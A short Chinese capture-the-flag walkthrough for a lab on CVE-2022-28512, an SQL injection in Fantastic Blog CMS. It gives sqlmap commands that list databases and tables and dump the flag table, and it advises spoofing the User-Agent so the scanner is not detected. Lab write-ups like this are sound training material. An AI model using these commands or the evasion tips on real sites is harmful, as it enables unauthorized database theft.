春秋云境 CVE-2022-28512
春秋云境 CVE-2022-28512
靶场介绍:
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
1.打开题目进入Fantastic Blog首页
2.访问url/single.php?id=1页面
3.并用burp抓包
使用cookie参数可以绕过身份验证,添加user-agent参数可以绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断
4.构造sqlmap的注入攻击
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1665631205; __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000
5.爆库
sqlmap -u http://eci-2ze3fvrdzptgbl2fagkt.cloudeci1.ichunqiu.com/single.php?id=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --cookie " __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000" --batch --dbs
数据库如下,我们需要的是ctf的信息
6. 所以接下来爆ctf的表
sqlmap -u http://eci-2ze3fvrdzptgbl2fagkt.cloudeci1.ichunqiu.com/single.php?id=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --cookie " __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000" --batch -D "ctf" --tables
爆出了我们想要的flag字段
7.猎杀时刻,爆字段
sqlmap -u http://eci-2ze3fvrdzptgbl2fagkt.cloudeci1.ichunqiu.com/single.php?id=1 --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --cookie " __atuvc=1%7C8; __atuvs=63f57784e9dc26ac000" --batch -D "ctf" -T "flag" --dump
拿到flag